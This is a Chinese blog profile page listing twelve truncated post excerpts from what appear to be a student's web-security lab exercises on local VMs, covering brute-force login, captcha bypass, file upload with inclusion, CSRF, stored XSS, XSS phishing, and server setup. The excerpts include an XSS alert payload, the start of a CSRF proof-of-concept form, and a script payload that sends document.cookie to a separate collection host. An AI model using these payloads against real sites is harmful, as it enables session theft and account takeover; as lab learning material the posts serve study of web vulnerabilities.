自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 收藏
  • 关注

原创 暴力破解测试

一、简单破解1.输入账号密码2.发送到攻击模块4.设置变量以及攻击方式5.导入字典,开始攻击6.选出长度差别较大的一项为结果二、验证码复用破解1.输入账号密码2.发送到重放和攻击模块3.实行重放4.设置变量5.导入账号字典6.导入密码字典并开始攻击7.长度差异较大为正确账号密码...

2020-07-02 17:14:20 670

原创 搭建weblogic服务器并测试

一、搭建Weblogic服务器1.网上有很多教程,一看就会。我就不写了2.搭建好了之后,点击这样一个应用输入账号密码就能进去了或者直接到安装目录打开3.输入 localhost:7001/console 就能进到控制台了二、新建JNID数据源1.点击一般数据源2.输入数据源名称并选择数据库类型3.选择第一个数据源驱动4.选择如图5.依次输入名称、主机名、端口号等。。。。。。6.点击测试配置,成功如图所示;若失败可能有..

2020-06-24 21:33:11 643

原创 负载均衡的实验

一、下载nginx安装到服务器1)启动nginx2)访问本地localhost二、实验规划 1台客户端 1个负载均衡服务器172.20.171.172 2个网页服务器 1)192.168.56.129 2)linux.51yip.com三、...

2020-06-23 18:47:58 899

原创 IIS的配置及漏洞验证

首先在Windows server 2003 上安装好 IIS 6一、配置好IIS并进入IIS管理器1.新建网站时,站名自取,建好之后,右击新建好的网站,点击属性.2.进入后点击主目录,再点击主目录下的配置.3.在调试标志的两个框里打勾.4.在选项中启用父路径.5.1)点击文档.2)添加index.php并将其上移之第一行.3)点确定.6.将框中的区域选项修改为允许.7.运行成功.二、IIS漏洞验证漏洞一II

2020-06-22 22:07:52 403

原创 上传漏洞与本地文件包含结合实验

一、了解不安全文件上传漏洞-getimagesize()伪造包含漏洞的图片文件二、将含有漏洞的图片上传至服务器1.更改地址2.生成脚本文件至服务器三、启动脚本显示出所有系统信息...

2020-05-29 13:39:49 262

原创 CSRF(post)漏洞复现

一、分析代码发现验证refer,没有token验证,没有防止csrf的措施二、构建一个错误信息脚本csrf_poc.php放入http://192.168.56.129/pikachu-master/vul/csrf 中<html> <body> <form name="px" method="post" action="http://192.168.56.129/pikachu-master/vul/csrf/csrf.

2020-05-25 20:50:45 1333

原创 动态路由配置ospf

一、路由截图二、ping结果图

2020-05-25 12:02:18 178

原创 滑动验证码的破解

一、查看网页源码该页面可以通过name=‘token’及value的调用来进行绕过二、使用宏命令来调用token1.创建宏命令2.添加规则3.测试宏命令是否成功重放前重放后token值发生变化,调用成功三、开始攻击1.发送到攻击模块,设置变量及攻击方式2.导入字典,开始攻击长度为496的为正确结果...

2020-05-21 20:57:25 570

原创 直连路由的创建

一、直连路由结果二、ping

2020-05-18 12:06:56 887

原创 存储xss修复

一、输入payload<script>alert('存储型XSS')</script>二、替换代码 $stop = array(" +","- "," 0","o "," a","b","c "); $start = array("<",">","(",")","\'","/","\"); $message = str_re...

2020-05-03 20:59:12 649

原创 完成xss漏洞利用-XSS钓鱼实验

一、钓鱼脚本fish.php<?phperror_reporting(0);// var_dump($_SERVER);if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {//发送认证框,并给出迷惑性的info header('Content-type:t...

2020-04-25 19:02:19 538 3

原创 【xss漏洞】cookie获取与利用实验

一、相关函数方法 解释 document.location=‘url’ 转跳指定url document.cookie 返回该页面cookie值 二、构建payload<script>document.location='http://192.168.56.132/pkxss/xcookie/cookie.php?cookie='+documen...

2020-04-18 19:45:33 411

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除